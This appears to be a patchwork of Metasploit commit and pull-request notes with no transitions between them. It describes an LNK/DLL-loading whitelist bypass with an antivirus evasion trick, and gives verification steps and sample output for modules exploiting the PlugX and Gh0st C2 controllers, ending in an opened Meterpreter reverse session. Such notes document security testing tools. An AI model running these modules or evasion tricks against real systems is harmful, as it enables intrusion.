tried to overcome issues with slowdown
around the 4500 connection mark by using the
supervisor pattern to terminate the threads on
the backend. this seems to get us further, but we still
hit a slowdown and the allocations die out before
we hit any serious usage
Remove the This PC ItemID to bypass (some) AV.
Timeout for WaitForSingleObject is set to 2,5s. After this timeout a
mutex is released allowed a new payload to be executed.
This module exploits a vulnerability in the handling of Windows
Shortcut files (.LNK) that contain a dynamic icon, loaded from a
malicious DLL.
This vulnerability is a variant of MS15-020 (CVE-2015-0096). The
created LNK file is similar except in an additional
SpecialFolderDataBlock is included. The folder ID set in this
SpecialFolderDataBlock is set to the Control Panel. This is enought to
bypass the CPL whitelist. This bypass can be used to trick Windows into
loading an arbitrary DLL file.
fixed typo in xtreme.rb when communicating with C&C
removed self.class from options on all three modules
added line to log path where loot has been stored in xtreme.rb
This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message. This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained.
## Verification
Run the PlugX C2 server on a target windows machine. The sample 9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6 is a Plux Type 1 server that works good for testing.
- [ ] use exploit/windows/misc/plugx
- [ ] set RHOST [ip of target]
- [ ] set target 1
- [ ] exploit
- [ ] acknowledge the "PeDecodePacket" message on the target
Sample output:
```
msf> use exploit/windows/misc/plugx
msf exploit(plugx) > set rhost 192.168.161.128
rhost => 192.168.161.128
msf exploit(plugx) > set target 1
target => 1
msf exploit(plugx) > check
[*] 192.168.161.128:13579 - "\x03\xB0\x02\x00\x04\x00"
[*] 192.168.161.128:13579 The target appears to be vulnerable.
msf exploit(plugx) >
This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim. This vulnerability can allow remote code execution
## Verification
Run the Gh0st C2 server on a target windows machine. The sample 0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c is a Gh0st 3.6 server that works good for testing.
- [ ] use exploit/windows/misc/gh0st
- [ ] set RHOST [ip of target]
- [ ] exploit
Sample output:
```
msf > use exploit/windows/misc/gh0st
msf exploit(gh0st) > set rhost 192.168.161.128
rhost => 192.168.161.128
msf exploit(gh0st) > exploit
[*] Started reverse TCP handler on 192.168.161.1:4444
[*] 192.168.161.128:80 - Trying target Gh0st Beta 3.6
[*] 192.168.161.128:80 - Spraying heap...
[*] 192.168.161.128:80 - Trying command 103...
[*] Sending stage (957487 bytes) to 192.168.161.128
[*] Meterpreter session 1 opened (192.168.161.1:4444 -> 192.168.161.128:49161) at 2017-07-29 10:11:4
This gives exploit/multi/handler a makeover, updating to use more-or-less
standard Ruby, and removing any mystical hacks at the same time (like select
instead of sleep).
This also gives it a Passive stance, and sets ExitOnSession to be false by
default, which is the setting that people use 99% of the time anyway.
David Maloney